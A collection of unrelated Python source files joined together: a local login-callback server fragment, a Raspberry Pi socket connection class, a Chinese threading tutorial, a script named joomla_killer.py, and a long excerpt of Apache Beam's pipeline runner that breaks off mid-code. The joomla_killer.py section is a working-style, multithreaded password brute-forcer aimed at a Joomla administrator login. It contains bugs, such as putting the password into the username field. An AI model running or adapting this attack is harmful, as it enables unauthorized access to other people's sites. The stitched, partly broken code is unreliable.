text = text.replace("##text_placeholder##", greeting_html)
text = text.replace("##headline##", "Login Successful")
console.success(f"{greeting_text} You are now logged in!")
response_body = text.encode("utf-8")
self.send_text_response(response_body)
Thread(target=server.shutdown).start()
def log_request(self, *args, **kwargs):
return
port = get_callback_port()
server = HTTPServer(("", port), CallbackHandler)
Thread(target=server.serve_forever).start()
return port
|
connection.py
|
"""
Connection module for exchanging data with the Raspberry Pi.
"""
from socket import socket, SHUT_RDWR
from multiprocessing import Process
from threading import Thread
import msgpack
from msgpack import UnpackException
from ..constants.networking import CONNECTION_IP, CONNECTION_PORT, CONNECTION_DATA_SIZE
from ..constants.athena import RK_CONNECTION_SURFACE_PI
from ..utils import logger
from ..athena import DataManager
from ..exceptions import NetworkingException
from ..enums import ConnectionStatus
# noinspection PyMethodParameters
class Connection:
"""
Communicate with Raspberry Pi by establishing a 2-way data exchange via a TCP network.
A connection is a non-enforced singleton featuring the following functionalities:
- set and retrieve connection status
- network data using a socket
- connect to the server in a non-blocking manner
- communicate with the server in a separate process
- clean up resources
Upon the communication process ending, the `IDLE` connection status will be set. The calling code must then handle
this scenario, for example by `reconnect`-ing.
"""
def __init__(self):
self._ip = CONNECTION_IP
self._port = CONNECTION_PORT
self._data_size = CONNECTION_DATA_SIZE
self._address = self._ip, self._port
self._socket = self._new_socket()
self._communication_process = self._new_process()
@property
def status(self) -> ConnectionStatus:
"""
Retrieve current connection's state (process-independent).
"""
return ConnectionStatus(DataManager.connections[RK_CONNECTION_SURFACE_PI])
@status.setter
def status(self, value: ConnectionStatus):
"""
Set the connection's state (process-independent).
"""
# pylint: disable = no-self-use
DataManager.connections[RK_CONNECTION_SURFACE_PI] = value.value
@staticmethod
def _new_socket() -> socket:
"""
Build a new socket needed for networking purposes.
"""
return socket()
def _new_process(self) -> Process:
"""
Create an new process needed for making communication a non-blocking, efficient operation.
"""
return Process(target=self._communicate)
def connect(self):
"""
Connect to the server.
Runs all connection methods in a separate thread, to avoid hanging the main thread on the blocking operations.
"""
Thread(target=self._connect_threaded).start()
def _connect_threaded(self):
"""
Connect to the server and start the communication process.
Connection may only happen if the client is currently disconnected.
Connection failures are silent and will not cause any global exceptions to be raised.
"""
if self.status != ConnectionStatus.DISCONNECTED:
logger.warning(f"Can't connect to {self._ip}:{self._port} - not disconnected (status is {self.status})")
return
logger.info(f"Connecting to {self._ip}:{self._port}")
self.status = ConnectionStatus.CONNECTING
try:
self._socket.connect(self._address)
self._communication_process.start()
self.status = ConnectionStatus.CONNECTED
logger.info(f"Connected to {self._ip}:{self._port}")
except OSError:
logger.exception("Failed to connect safely")
self.status = ConnectionStatus.DISCONNECTED
self._cleanup(ignore_errors=True)
def _communicate(self):
"""
Exchange data with the server.
Within the loop, the client sends the data first, and then waits for a response. Once the loop is exited, the
`IDLE` status is set, and the calling code must detect and handle this on their own.
"""
while True:
try:
# Send the data to the server and retrieve immediately after (2-way-communication)
self._socket.sendall(msgpack.packb(DataManager.transmission.all()))
received_data = self._socket.recv(self._data_size)
# Exit if connection closed by server
if not received_data:
logger.info(f"Communication with {self._ip}:{self._port} ended by the server")
break
# Quit on any incorrectly formatted data
try:
received_data = msgpack.unpackb(received_data)
except UnpackException:
logger.exception(f"Failed to unpack the following data: {received_data}")
break
# Only handle valid, non-empty data
if received_data and isinstance(received_data, dict):
DataManager.received.update(received_data)
except (UnpackException, OSError):
logger.exception("An error occurred while communicating with the server")
break
# Once the communication has ended, the IDLE status will be set - should be detected and handled by the caller
self.status = ConnectionStatus.IDLE
def disconnect(self):
"""
Disconnected from the server.
Disconnection may only happen if the client is connected or idle.
Disconnection failures are silent and will not cause any global exceptions to be raised.
The `DISCONNECTED` status will always be set, regardless of whether the connection has been shut down properly
or not. This is to avoid the client being unable to connect again in case of non-handled issues.
"""
if self.status != ConnectionStatus.CONNECTED and self.status != ConnectionStatus.IDLE:
logger.warning(f"Can't disconnect from {self._ip}:{self._port} - not connected or idle "
f"(status is {self.status})")
return
logger.info(f"Disconnecting from {self._ip}:{self._port}")
self.status = ConnectionStatus.DISCONNECTING
try:
self._cleanup()
logger.info(f"Disconnected from {self._ip}:{self._port}")
except OSError:
logger.exception("Failed to disconnect safely")
self._cleanup(ignore_errors=True)
# Set the disconnected status regardless of what happened above, to avoid deadlocking
self.status = ConnectionStatus.DISCONNECTED
def _cleanup(self, ignore_errors: bool = False):
"""
Stop all components as well as recreate the socket and the communication process.
"""
try:
if self._communication_process.is_alive():
self._communication_process.terminate()
self._communication_process = self._new_process()
self._socket.shutdown(SHUT_RDWR)
self._socket.close()
self._socket = self._new_socket()
except OSError as ex:
if ignore_errors:
logger.debug(f"Ignoring connection cleanup error - {ex}")
else:
raise NetworkingException("Failed to cleanup the connection") from ex
def reconnect(self):
"""
Disconnect and connect again.
"""
logger.info(f"Reconnecting to {self._ip}:{self._port}")
self.disconnect()
self.connect()
|
Lesson15.py
|
#Python的多线程:
import threading ,time ,random
#在子线程中进行轮询操作
def loop():
#显示当前线程的名字
print("current thread name: %s"%threading.current_thread().name)
n = 0
while n<5:
print("thread %s ==> %s"%(threading.current_thread().name,n))
n+=1
time.sleep(1)
print("child thread is finished !!")
pass
if __name__ == '__main__':
#打印主线程的名字
print("main tread name %s"%threading.current_thread().name)
#创建子线程
t =threading.Thread(target=loop,name="LoopThread")
t.start()
#执行其他的线程
t.join()
pass
"线程同步"
def change_it(n):
# 先存后取,结果应该为0:
global balance
balance = balance + n
balance = balance - n
balance = 0
lock =threading.Lock()
def run_thread(n):
for i in range(100):
lock.acquire()
try:
print("current thread",threading.current_thread().name)
change_it(n)
finally:
lock.release()
t1 = threading.Thread(target=run_thread, args=(5,))
t2 = threading.Thread(target=run_thread, args=(8,))
t1.start()
t2.start()
t1.join()
t2.join()
print(balance)
"""
当多个线程同时执行lock.acquire()时,只有一个线程能成功地获取锁,然后继续执行代码,其他线程就继续等待直到获得锁为止。
获得锁的线程用完后一定要释放锁,否则那些苦苦等待锁的线程将永远等待下去,成为死线程。
##所以我们用try...finally来确保锁一定会被释放。
锁的好处就是确保了某段关键代码只能由一个线程从头到尾完整地执行,坏处当然也很多,首先是阻止了多线程并发执行,
包含锁的某段代码实际上只能以单线程模式执行,效率就大大地下降了。其次,由于可以存在多个锁,不同的线程持有不同的锁,
并试图获取对方持有的锁时,可能会造成死锁,导致多个线程全部挂起,既不能执行,也无法结束,只能靠操作系统强制终止。
"""
|
joomla_killer.py
|
import http.cookiejar
import queue
import threading
import urllib.error
import urllib.parse
import urllib.request
from abc import ABC #Abstract Base Classes
from html.parser import HTMLParser
# global settings
user_thread = 10
username = "admin"
wordlist_file = "cain.txt"
resume = None
# target settings
# start from a local testing installation before going into the wild
target_url = "http://192.168.112.131/administrator/index.php"
target_post = "http://192.168.112.131/administrator/index.php"
username_field = "username"
password_field = "pswd"
success_check = "Administration - Control Panel"
class BruteParser(HTMLParser, ABC):
def __init__(self):
HTMLParser.__init__(self)
self.tag_results = {}
def handle_starttag(self, tag, attrs):
if tag == "input":
tag_name = None
for name, value in attrs:
if name == "name":
tag_name = value
if tag_name:
self.tag_results[tag_name] = value
class Bruter(object):
def __init__(self, user, words_q):
self.username = user
self.password_q = words_q
self.found = False
print(f"Finished setting up for: {user}")
def run_bruteforce(self):
for thread in range(user_thread):
t = threading.Thread(target=self.web_bruter)
t.start()
def web_bruter(self):
while not self.password_q.empty() and not self.found:
brute = self.password_q.get().rstrip()
jar = http.cookiejar.FileCookieJar("cookies")
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
response = opener.open(target_url)
page = response.read
print(f"Trying: {self.username}: {brute} ({self.password_q.qsize()} left)")
# parse out the hidden fields
parser = BruteParser()
parser.feed(page)
post_tags = parser.tag_results
# add our username and password fields
post_tags[username_field] = self.username
post_tags[username_field] = brute
login_data = urllib.parse.urlencode(post_tags)
login_response = opener.open(target_post, login_data)
login_result = login_response.read()
if success_check in login_result:
self.found = True
print("[*] Bruteforce successful.")
print(f"[*] Username: {username}")
print(f"[*] Password:{brute}")
print("[*] Waiting for other threads to exit...")
def build_wordlist(word_list_file):
with open (word_list_file, "r") as l:
raw_words = [line.rstrip("\n") for line in l]
found_resume = False
word_queue = queue.Queue()
for word in raw_words:
if resume:
if found_resume:
word_queue.put(word)
else:
if word == resume:
found_resume = True
print(f"Resuming wordlist from: {resume}")
else:
word_queue.put(word)
return word_queue
words = build_wordlist(wordlist_file)
bruter_obj = Bruter(username, words)
bruter_obj.run_bruteforce()
|
fn_api_runner.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""A PipelineRunner using the SDK harness.
"""
from __future__ import absolute_import
from __future__ import print_function
import collections
import contextlib
import copy
import itertools
import logging
import os
import queue
import subprocess
import sys
import threading
import time
import uuid
from builtins import object
from concurrent import futures
import grpc
import apache_beam as beam # pylint: disable=ungrouped-imports
from apache_beam import coders
from apache_beam import metrics
from apache_beam.coders.coder_impl import create_InputStream
from apache_beam.coders.coder_impl import create_OutputStream
from apache_beam.metrics import monitoring_infos
from apache_beam.metrics.execution import MetricKey
from apache_beam.metrics.execution import MetricsEnvironment
from apache_beam.metrics.metricbase import MetricName
from apache_beam.options import pipeline_options
from apache_beam.options.value_provider import RuntimeValueProvider
from apache_beam.portability import common_urns
from apache_beam.portability import python_urns
from apache_beam.portability.api import beam_artifact_api_pb2_grpc
from apache_beam.portability.api import beam_fn_api_pb2
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.portability.api import beam_provision_api_pb2
from apache_beam.portability.api import beam_provision_api_pb2_grpc
from apache_beam.portability.api import beam_runner_api_pb2
from apache_beam.portability.api import endpoints_pb2
from apache_beam.runners import pipeline_context
from apache_beam.runners import runner
from apache_beam.runners.portability import artifact_service
from apache_beam.runners.portability import fn_api_runner_transforms
from apache_beam.runners.portability.fn_api_runner_transforms import create_buffer_id
from apache_beam.runners.portability.fn_api_runner_transforms import only_element
from apache_beam.runners.portability.fn_api_runner_transforms import split_buffer_id
from apache_beam.runners.portability.fn_api_runner_transforms import unique_name
from apache_beam.runners.worker import bundle_processor
from apache_beam.runners.worker import data_plane
from apache_beam.runners.worker import sdk_worker
from apache_beam.runners.worker.channel_factory import GRPCChannelFactory
from apache_beam.transforms import trigger
from apache_beam.transforms.window import GlobalWindows
from apache_beam.utils import profiler
from apache_beam.utils import proto_utils
# This module is experimental. No backwards-compatibility guarantees.
ENCODED_IMPULSE_VALUE = beam.coders.WindowedValueCoder(
beam.coders.BytesCoder(),
beam.coders.coders.GlobalWindowCoder()).get_impl().encode_nested(
beam.transforms.window.GlobalWindows.windowed_value(b''))
class BeamFnControlServicer(beam_fn_api_pb2_grpc.BeamFnControlServicer):
UNSTARTED_STATE = 'unstarted'
STARTED_STATE = 'started'
DONE_STATE = 'done'
_DONE_MARKER = object()
def __init__(self):
self._push_queue = queue.Queue()
self._futures_by_id = dict()
self._read_thread = threading.Thread(
name='beam_control_read', target=self._read)
self._uid_counter = 0
self._state = self.UNSTARTED_STATE
self._lock = threading.Lock()
def Control(self, iterator, context):
with self._lock:
if self._state == self.DONE_STATE:
return
else:
self._state = self.STARTED_STATE
self._inputs = iterator
# Note: We only support one client for now.
self._read_thread.start()
while True:
to_push = self._push_queue.get()
if to_push is self._DONE_MARKER:
return
yield to_push
def _read(self):
for data in self._inputs:
self._futures_by_id.pop(data.instruction_id).set(data)
def push(self, item):
if item is self._DONE_MARKER:
future = None
else:
if not item.instruction_id:
self._uid_counter += 1
item.instruction_id = 'control_%s' % self._uid_counter
future = ControlFuture(item.instruction_id)
self._futures_by_id[item.instruction_id] = future
self._push_queue.put(item)
return future
def done(self):
with self._lock:
if self._state == self.STARTED_STATE:
self.push(self._DONE_MARKER)
self._read_thread.join()
self._state = self.DONE_STATE
class _GroupingBuffer(object):
"""Used to accumulate groupded (shuffled) results."""
def __init__(self, pre_grouped_coder, post_grouped_coder, windowing):
self._key_coder = pre_grouped_coder.key_coder()
self._pre_grouped_coder = pre_grouped_coder
self._post_grouped_coder = post_grouped_coder
self._table = collections.defaultdict(list)
self._windowing = windowing
self._grouped_output = None
def append(self, elements_data):
if self._grouped_output:
raise RuntimeError('Grouping table append after read.')
input_stream = create_InputStream(elements_data)
coder_impl = self._pre_grouped_coder.get_impl()
key_coder_impl = self._key_coder.get_impl()
# TODO(robertwb): We could optimize this even more by using a
# window-dropping coder for the data plane.
is_trivial_windowing = self._windowing.is_default()
while input_stream.size() > 0:
windowed_key_value = coder_impl.decode_from_stream(input_stream, True)
key, value = windowed_key_value.value
self._table[key_coder_impl.encode(key)].append(
value if is_trivial_windowing
else windowed_key_value.with_value(value))
def __iter__(self):
if not self._grouped_output:
output_stream = create_OutputStream()
if self._windowing.is_default():
globally_window = GlobalWindows.windowed_value(None).with_value
windowed_key_values = lambda key, values: [
globally_window((key, values))]
else:
trigger_driver = trigger.create_trigger_driver(self._windowing, True)
windowed_key_values = trigger_driver.process_entire_key
coder_impl = self._post_grouped_coder.get_impl()
key_coder_impl = self._key_coder.get_impl()
for encoded_key, windowed_values in self._table.items():
key = key_coder_impl.decode(encoded_key)
for wkvs in windowed_key_values(key, windowed_values):
coder_impl.encode_to_stream(wkvs, output_stream, True)
self._grouped_output = [output_stream.get()]
self._table = None
return iter(self._grouped_output)
class _WindowGroupingBuffer(object):
"""Used to partition windowed side inputs."""
def __init__(self, access_pattern, coder):
# Here's where we would use a different type of partitioning
# (e.g. also by key) for a different access pattern.
if access_pattern.urn == common_urns.side_inputs.ITERABLE.urn:
self._kv_extrator = lambda value: ('', value)
self._key_coder = coders.SingletonCoder('')
self._value_coder = coder.wrapped_value_coder
elif access_pattern.urn == common_urns.side_inputs.MULTIMAP.urn:
self._kv_extrator = lambda value: value
self._key_coder = coder.wrapped_value_coder.key_coder()
self._value_coder = (
coder.wrapped_value_coder.value_coder())
else:
raise ValueError(
"Unknown access pattern: '%s'" % access_pattern.urn)
self._windowed_value_coder = coder
self._window_coder = coder.window_coder
self._values_by_window = collections.defaultdict(list)
def append(self, elements_data):
input_stream = create_InputStream(elements_data)
while input_stream.size() > 0:
windowed_value = self._windowed_value_coder.get_impl(
).decode_from_stream(input_stream, True)
key, value = self._kv_extrator(windowed_value.value)
for window in windowed_value.windows:
self._values_by_window[key, window].append(value)
def encoded_items(self):
value_coder_impl = self._value_coder.get_impl()
key_coder_impl = self._key_coder.get_impl()
for (key, window), values in self._values_by_window.items():
encoded_window = self._window_coder.encode(window)
encoded_key = key_coder_impl.encode_nested(key)
output_stream = create_OutputStream()
for value in values:
value_coder_impl.encode_to_stream(value, output_stream, True)
yield encoded_key, encoded_window, output_stream.get()
class FnApiRunner(runner.PipelineRunner):
def __init__(
self,
default_environment=None,
bundle_repeat=0,
use_state_iterables=False,
provision_info=None):
"""Creates a new Fn API Runner.
Args:
default_environment: the default environment to use for UserFns.
bundle_repeat: replay every bundle this many extra times, for profiling
and debugging
use_state_iterables: Intentionally split gbk iterables over state API
(for testing)
provision_info: provisioning info to make available to workers, or None
"""
super(FnApiRunner, self).__init__()
self._last_uid = -1
self._default_environment = (
default_environment
or beam_runner_api_pb2.Environment(urn=python_urns.EMBEDDED_PYTHON))
self._bundle_repeat = bundle_repeat
self._progress_frequency = None
self._profiler_factory = None
self._use_state_iterables = use_state_iterables
self._provision_info = provision_info
def _next_uid(self):
self._last_uid += 1
return str(self._last_uid)
def run_pipeline(self, pipeline, options):
MetricsEnvironment.set_metrics_supported(False)
RuntimeValueProvider.set_runtime_options({})
# This is sometimes needed if type checking is disabled
# to enforce that the inputs (and outputs) of GroupByKey operations
# are known to be KVs.
from apache_beam.runners.dataflow.dataflow_runner import DataflowRunner
pipeline.visit(DataflowRunner.group_by_key_input_visitor())
self._bundle_repeat = self._bundle_repeat or options.view_as(
pipeline_options.DirectOptions).direct_runner_bundle_repeat
self._profiler_factory = profiler.Profile.factory_from_options(
options.view_as(pipeline_options.ProfilingOptions))
self._latest_run_result = self.run_via_runner_api(pipeline.to_runner_api(
default_environment=self._default_environment))
return self._latest_run_result
def run_via_runner_api(self, pipeline_proto):
return self.run_stages(*self.create_stages(pipeline_proto))
@contextlib.contextmanager
def maybe_profile(self):
if self._profiler_factory:
try:
profile_id = 'direct-' + subprocess.check_output(
['git', 'rev-parse', '--abbrev-ref', 'HEAD']
).decode(errors='ignore').strip()
except subprocess.CalledProcessError:
profile_id = 'direct-unknown'
profiler = self._profiler_factory(profile_id, time_prefix='')
else:
profiler = None
if profiler:
with profiler:
yield
if not self._bundle_repeat:
logging.warning(
'The --direct_runner_bundle_repeat option is not set; '
'a significant portion of the profile may be one-time overhead.')
path = profiler.profile_output
print('CPU Profile written to %s' % path)
try:
import gprof2dot # pylint: disable=unused-variable
if not subprocess.call([
sys.executable, '-m', 'gprof2dot',
'-f', 'pstats', path, '-o', path + '.dot']):
if not subprocess.call(
['dot', '-Tsvg', '-o', path + '.svg', path + '.dot']):
print('CPU Profile rendering at file://%s.svg'
% os.path.abspath(path))
except ImportError:
# pylint: disable=superfluous-parens
print('Please install gprof2dot and dot for profile renderings.')
else:
# Empty context.
yield
def create_stages(self, pipeline_proto):
return fn_api_runner_transforms.create_and_optimize_stages(
copy.deepcopy(pipeline_proto),
phases=[fn_api_runner_transforms.annotate_downstream_side_inputs,
fn_api_runner_transforms.fix_side_input_pcoll_coders,
fn_api_runner_transforms.lift_combiners,
fn_api_runner_transforms.expand_sdf,
fn_api_runner_transforms.expand_gbk,
fn_api_runner_transforms.sink_flattens,
fn_api_runner_transforms.greedily_fuse,
fn_api_runner_transforms.read_to_impulse,
fn_api_runner_transforms.impulse_to_input,
fn_api_runner_transforms.inject_timer_pcollections,
fn_api_runner_transforms.sort_stages,
fn_api_runner_transforms.window_pcollection_coders],
known_runner_urns=frozenset([
common_urns.primitives.FLATTEN.urn,
common_urns.primitives.GROUP_BY_KEY.urn]),
use_state_iterables=self._use_state_iterables)
def run_stages(self, stage_context, stages):
worker_handler_manager = WorkerHandlerManager(
stage_context.components.environments, self._provision_info)
metrics_by_stage = {}
monitoring_infos_by_stage = {}
try:
with self.maybe_profile():
pcoll_buffers = collections.defaultdict(list)
for stage in stages:
stage_results = self.run_stage(
worker_handler_manager.get_worker_handler,
stage_context.components,
stage,
pcoll_buffers,
stage_context.safe_coders)
metrics_by_stage[stage.name] = stage_results.process_bundle.metrics
monitoring_infos_by_stage[stage.name] = (
stage_results.process_bundle.monitoring_infos)
finally:
worker_handler_manager.close_all()
return RunnerResult(
runner.PipelineState.DONE, monitoring_infos_by_stage, metrics_by_stage)
def run_stage(
self,
worker_handler_factory,
pipeline_components,
stage,
pcoll_buffers,
safe_coders):
def iterable_state_write(values, element_coder_impl):
token = unique_name(None, 'iter').encode('ascii')
out = create_OutputStream()
for element in values:
element_coder_impl.encode_to_stream(element, out, True)
controller.state.blocking_append(
beam_fn_api_pb2.StateKey(
runner=beam_fn_api_pb2.StateKey.Runner(key=token)),
out.get())
return token
controller = worker_handler_factory(stage.environment)
context = pipeline_context.PipelineContext(
pipeline_components, iterable_state_write=iterable_state_write)
data_api_service_descriptor = controller.data_api_service_descriptor()
def extract_endpoints(stage):
# Returns maps of transform names to PCollection identifiers.
# Also mutates IO stages to point to the data ApiServiceDescriptor.
data_input = {}
data_side_input = {}
data_output = {}
for transform in stage.transforms:
if transform.spec.urn in (bundle_processor.DATA_INPUT_URN,
bundle_processor.DATA_OUTPUT_URN):
pcoll_id = transform.spec.payload
if transform.spec.urn == bundle_processor.DATA_INPUT_URN:
target = transform.unique_name, only_element(transform.outputs)
if pcoll_id == fn_api_runner_transforms.IMPULSE_BUFFER:
data_input[target] = [ENCODED_IMPULSE_VALUE]
else:
data_input[target] = pcoll_buffers[pcoll_id]
coder_id = pipeline_components.pcollections[
only_element(transform.outputs.values())].coder_id
elif transform.spec.urn == bundle_processor.DATA_OUTPUT_URN:
target = transform.unique_name, only_element(transform.inputs)
data_output[target] = pcoll_id
coder_id = pipeline_components.pcollections[
only_element(transform.inputs.values())].coder_id
else:
raise NotImplementedError
data_spec = beam_fn_api_pb2.RemoteGrpcPort(coder_id=coder_id)
if data_api_service_descriptor:
data_spec.api_service_descriptor.url = (
data_api_service_descriptor.url)
transform.spec.payload = data_spec.SerializeToString()
elif transform.spec.urn in fn_api_runner_transforms.PAR_DO_URNS:
payload = proto_utils.parse_Bytes(
transform.spec.payload, beam_runner_api_pb2.ParDoPayload)
for tag, si in payload.side_inputs.items():
data_side_input[transform.unique_name, tag] = (
create_buffer_id(transform.inputs[tag]), si.access_pattern)
return data_input, data_side_input, data_output
logging.info('Running %s', stage.name)
logging.debug(' %s', stage)
data_input, data_side_input, data_output = extract_endpoints(stage)
process_bundle_descriptor = beam_fn_api_pb2.ProcessBundleDescriptor(
id=self._next_uid(),
transforms={transform.unique_name: transform
for transform in stage.transforms},
pcollections=dict(pipeline_components.pcollections.items()),
coders=dict(pipeline_components.coders.items()),
windowing_strategies=dict(
pipeline_components.windowing_strategies.items()),
environments=dict(pipeline_components.environments.items()))
if controller.state_api_service_descriptor():
process_bundle_descriptor.state_api_service_descriptor.url = (
controller.state_api_service_descriptor().url)
# Store the required side inputs into state.
for (transform_id, tag), (buffer_id, si) in data_side_input.items():
_, pcoll_id = split_buffer_id(buffer_id)
value_coder = context.coders[safe_coders[
pipeline_components.pcollections[pcoll_id].coder_id]]
elements_by_window = _WindowGroupingBuffer(si, value_coder)
for element_data in pcoll_buffers[buffer_id]:
elements_by_window.append(element_data)
for key, window, elements_data in elements_by_window.encoded_items():
state_key = beam_fn_api_pb2.StateKey(
multimap_side_input=beam_fn_api_pb2.StateKey.MultimapSideInput(
ptransform_id=transform_id,
side_input_id=tag,
window=window,
key=key))
controller.state.blocking_append(state_key, elements_data)
def get_buffer(buffer_id):
kind, name = split_buffer_id(buffer_id)
if kind in ('materialize', 'timers'):
if buffer_id not in pcoll_buffers:
# Just store the data chunks for replay.
pcoll_buffers[buffer_id] = list()
elif kind == 'group':
# This is a grouping write, create a grouping buffer if needed.
if buffer_id not in pcoll_buffers:
original_gbk_transform = name
transform_proto = pipeline_components.transforms[
original_gbk_transform]
input_pcoll = only_element(list(transform_proto.inputs.values()))
output_pcoll = only_element(list(transform_proto.outputs.values()))
pre_gbk_coder = context.coders[safe_coders[
pipeline_components.pcollections[input_pcoll].coder_id]]
post_gbk_coder = context.coders[safe_coders[
pipeline_components.pcollections[output_pcoll].coder_id]]
windowing_strategy = context.windowing_strategies[
pipeline_components
.pcollections[output_pcoll].windowing_strategy_id]
pcoll_buffers[buffer_id] = _GroupingBuffer(
pre_gbk_coder, post_gbk_coder, windowing_strategy)
else:
# These should be the only two identifiers we produce for now,
# but special side input writes may go here.
raise NotImplementedError(buffer_id)
return pcoll_buffers[buffer_id]
def get_input_coder_impl(transform_id):
return context.coders[safe_coders[
beam_fn_api_pb2.RemoteGrpcPort.FromString(
process_bundle_descriptor.transforms[transform_id].spec.payload
).coder_id
]].get_impl()
for k in range(self._bundle_repeat):
try:
controller.state.checkpoint()
BundleManager(
controller, lambda pcoll_id: [], get_input_coder_impl,
process_bundle_descriptor, self._progress_frequency, k
).process_bundle(data_input, data_output)
finally:
controller.state.restore()
result, splits = BundleManager(
controller, get_buffer, get_input_coder_impl, process_bundle_descriptor,
self._progress_frequency).process_bundle(
data_input, data_output)
def input_for(ptransform_id, input_id):
input_pcoll = process_bundle_descriptor.transforms[
ptransform_id].inputs[input_id]
for read_id, proto in process_bundle_descriptor.transforms.items():
if (proto.spec.urn == bundle_processor.DATA_INPUT_URN
and input_pcoll in proto.outputs.values()):
return read_id, 'out'
raise RuntimeError(
'No IO transform feeds %s' % ptransform_id)
last_result = result
last_sent = data_input
while True:
deferred_inputs = collections.defaultdict(list)
for transform_id, timer_writes in stage.timer_pcollections:
# Queue any set timers as new inputs.
windowed_timer_coder_impl = context.coders[
pipeline_components.pcollections[timer_writes].coder_id].get_impl()
written_timers = get_buffer(
create_buffer_id(timer_writes, kind='timers'))
if written_timers:
# Keep only the "last" timer set per key and window.
timers_by_key_and_window = {}
for elements_data in written_timers:
input_stream = create_InputStream(elements_data)
while input_stream.size() > 0:
windowed_key_timer = windowed_timer_coder_impl.decode_from_stream(
input_stream, True)
key, _ = windowed_key_timer.value
# TODO: Explode and merge windows.
assert len(windowed_key_timer.windows) == 1
timers_by_key_and_window[
key, windowed_key_timer.windows[0]] = windowed_key_timer
out = create_OutputStream()
for windowed_key_timer in timers_by_key_and_window.values():
windowed_timer_coder_impl.encode_to_stream(
windowed_key_timer, out, True)
deferred_inputs[transform_id, 'out'] = [out.get()]
written_timers[:] = []
# Queue any process-initiated delayed bundle applications.
for delayed_application in last_result.process_bundle.residual_roots:
deferred_inputs[
input_for(
delayed_application.application.ptransform_id,
delayed_application.application.input_id)
].append(delayed_application.application.element)
# Queue any runner-initiated delayed bundle applications.
prev_stops = {}
for split in splits:
for delayed_application in split.residual_roots:
deferred_inputs[
input_for(
delayed_application.application.ptransform_id,
delayed_application.application.input_id)
].append(delayed_application.application.element)
for channel_split in split.channel_splits:
coder_impl = get_input_coder_impl(channel_split.ptransform_id)
# TODO(SDF): This requires determanistic ordering of buffer iteration.
# TODO(SDF): The return split is in terms of indices. Ideally,
# a runner could map these back to actual positions to effectively
# describe the two "halves" of the now-split range. Even if we have
# to buffer each element we send (or at the very least a bit of
# metadata, like position, about each of them) this should be doable
# if they're already in memory and we are bounding the buffer size
# (e.g. to 10mb plus whatever is eagerly read from the SDK). In the
# case of non-split-points, we can either immediately replay the
# "non-split-position" elements or record them as we do the other
# delayed applications.
# Decode and recode to split the encoded buffer by element index.
all_elements = list(coder_impl.decode_all(b''.join(last_sent[
channel_split.ptransform_id, channel_split.input_id])))
residual_elements = all_elements[
channel_split.first_residual_element : prev_stops.get(
channel_split.ptransform_id, len(all_elements)) + 1]
if residual_elements:
deferred_inputs[
channel_split.ptransform_id, channel_split.input_id].append(
coder_impl.encode_all(residual_elements))
prev_stops[
channel_split.ptransform_id] = channel_split.last_primary_element
if deferred_inputs:
# The worker will be waiting on these inputs as well.
for other_input in data_input:
if other_input not in deferred_inputs:
deferred_inputs[other_input] = []
# TODO(robertwb): merge results
last_result, splits = BundleManager(
controller,
get_buffer,
get_input_coder_impl,
process_bundle_descriptor,
self._progress_frequency,
True).process_bundle(deferred_inputs, data_output)
last_sent = deferred_inputs
result = beam_fn_api_pb2.InstructionResponse(
process_bundle=beam_fn_api_pb2.ProcessBundleResponse(
monitoring_infos=monitoring_infos.consolidate(
itertools.chain(
result.process_bundle.monitoring_infos,
last_result.process_bundle.monitoring_infos))),
error=result.error or last_result.error)
else:
break
return result
# These classes are used to interact with the worker.
class StateServicer(beam_fn_api_pb2_grpc.BeamFnStateServicer):
class CopyOnWriteState(object):
def __init__(self, underlying):
self._underlying = underlying
self._overlay = {}
def __getitem__(self, key):
if key in self._overlay:
return self._overlay[key]
else:
return FnApiRunner.StateServicer.CopyOnWriteList(
self._underlying, self._overlay, key)
def __delitem__(self, key):
self._overlay[key] = []
def commit(self):
self._underlying.update(self._overlay)
return self._underlying
class CopyOnWriteList(object):
def __init__(self, underlying, overlay, key):
self._underlying = underlying
self._overlay = overlay
self._key = key
def __iter__(self):
if self._key in self._overlay:
return iter(self._overlay[self._key])
else:
return iter(self._underlying[self._key])
def append(self, item):
if self._key not in self._overlay:
self._overlay[self._key] = list(self._underlying[self._key])
self._overlay[self._key].append(item)
def __init__(self):
self._lock = threading.Lock()
self._state = collections.defaultdict(list)
self._checkpoint = None
self._use_continuation_tokens = False
self._continuations = {}
def checkpoint(self):
assert self._checkpoint is None
self._checkpoint = self._state
self._state = FnApiRunner.StateServicer.CopyOnWriteState(self._state)
def commit(self):
self._state.commit()
self._state = self._checkpoint.commit()
self._checkpoint = None
def restore(self):
self._state = self._checkpoint
self._checkpoint = None
@contextlib.contextmanager
def process_instruction_id(self, unused_instruction_id):
yield
def blocking_get(self, state_key, continuation_token=None):
with self._lock:
full_state = self._state[self._to_key(state_key)]
if self._use_continuation_tokens:
# The token is "nonce:index".
if not continuation_token:
token_base = 'token_%x' % len(self._continuations)
self._continuations[token_base] = tuple(full_state)
return b'', '%s:0' % token_base
else:
token_base, index = continuation_token.split(':')
ix = int(index)
full_state = self._continuations[token_base]
if ix == len(full_state):
return b'', None
else:
return full_state[ix], '%s:%d' % (token_base, ix + 1)
else:
assert not continuation_token
return b''.join(full_state), None
def blocking_append(self, state_key, data):
with self._lock:
self._state[self._to_key(state_key)].append(data)
def blocking_clear(self, state_key):
with self._lock:
del self._state[self._to_key(state_key)]
@staticmethod
def _to_key(state_key):
return state_key.SerializeToString()
class GrpcStateServicer(beam_fn_api_pb2_grpc.BeamFnStateServicer):
def __init__(self, state):
self._state = state
def State(self, request_stream, context=None):
# Note that this eagerly mutates state, assuming any failures are fatal.
# Thus it is safe to ignore instruction_reference.
for request in request_stream:
request_type = request.WhichOneof('request')
if request_type == 'get':
data, continuation_token = self._state.blocking_get(
request.state_key, request.get.continuation_token)
yield beam_fn_api_pb2.StateResponse(
id=request.id,
get=beam_fn_api_pb2.StateGetResponse(
data=data, continuation_token=continuation_token))
elif request_type == 'append':
self._state.blocking_append(request.state_key, request.append.data)
yield beam_fn_api_pb2.StateResponse(
id=request.id,
